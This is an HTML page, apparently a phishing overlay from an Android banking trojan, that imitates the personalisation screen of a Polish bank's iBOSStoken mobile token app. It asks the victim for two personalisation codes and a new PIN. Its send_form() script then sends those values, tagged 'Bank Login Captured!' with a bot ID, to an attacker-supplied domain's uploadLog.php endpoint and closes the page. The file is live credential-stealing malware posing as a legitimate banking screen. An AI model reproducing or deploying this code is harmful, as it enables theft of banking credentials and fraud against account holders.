<!DOCTYPE html>
<html>
<head>
    <title>mtoken</title>
    <link rel="shortcut icon" href="hr.asseco.android.mtoken.bos.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #fff;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
    text-align: right;
    background-size: 100%;
    padding: 20px 0px 20px 0px;
    color: #000;
    font-weight: 400;
    text-decoration: none;
    background: #d4e7e9;
    padding-right: 40px;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 20px 0px;
    color: #151515;
    outline: none;
    border: 2px solid #cecece;
    background: #fff;
    border-radius: 5px;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 17px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #4caf6a;
    border-radius: 30px;
}
fieldset span {
    display: inline-block;
    text-align: center;
    color: #4b4949;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #088f0d;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #151515;
    font-size: 15px;
}
.pass input::placeholder {
    font-size: 11px;
    color: #db2060;
}
</style>

<script type="text/javascript">


function next() {
    document.getElementById("loginn").style.display="none";
    document.getElementById("nastepny").style.display="none";
    document.getElementById("passw").style.display="block";
    document.getElementById("okay").style.display="block";
}

    function testJump(x){
    var ml = ~~x.getAttribute('maxlength');
    if(ml && x.value.length >= ml){
        do {
      x = x.nextSibling;
    }
    while (x && !((/text/.test(x.type)) || x.disabled));
        if(x && /text/.test(x.type)){
            x.focus();
        }
    }
}
</script>

<fieldset id="formtosend">

<div class="logo">
<span style="display: block; color: #00BCD4; float: left; padding: 0; font-weight: 400; padding-left: 20px;">Perzonalizacja iBOSStoken</span>
<a href="#" onclick="next()" style="text-decoration: none; color: #000; font-size: 20px;" id="nastepny">Następny</a>
<a href="#" onclick="send_form()" style="text-decoration: none; color: #000; font-size: 20px; display: none;" id="okay">OK</a>
</div>

<div id="log1">

<div class="area" style="padding: 20px 20px 50px 20px;border-radius: 3px;margin-top: 40px;">
    <div id="loginn">
    <label style="display: block; padding-bottom: 10px;">Wprowadż kod personalizacyjny:</label>
        <input type="text" name="code1" id="code1" maxlength="8" onkeyup="testJump(this);" style="height: 50px; max-width: 200px; display: inline-block;" placeholder="" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;">
        <input type="text" name="code2" id="code2" maxlength="8" onkeyup="testJump(this);" style="height: 50px; max-width: 200px; display: inline-block;" placeholder="" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;">
    </div>
    <div id="passw" style="display: none;">
<label style="float: left; padding-bottom: 10px;">Nadaj numer PIN:</label>
<input type="password" name="pin" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;">
<label style="float: left; padding-bottom: 10px;">Powtórz numer PIN:</label>
<input type="password" name="sumbit" onkeypress="if ( isNaN( String.fromCharCode(event.keyCode) )) return false;">
    </div>
</div>

</div>
        
        </div>
        <input name="exit" type="hidden" text="true"/>
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
        if (document.getElementById("code1").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
        if (document.getElementById("code2").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>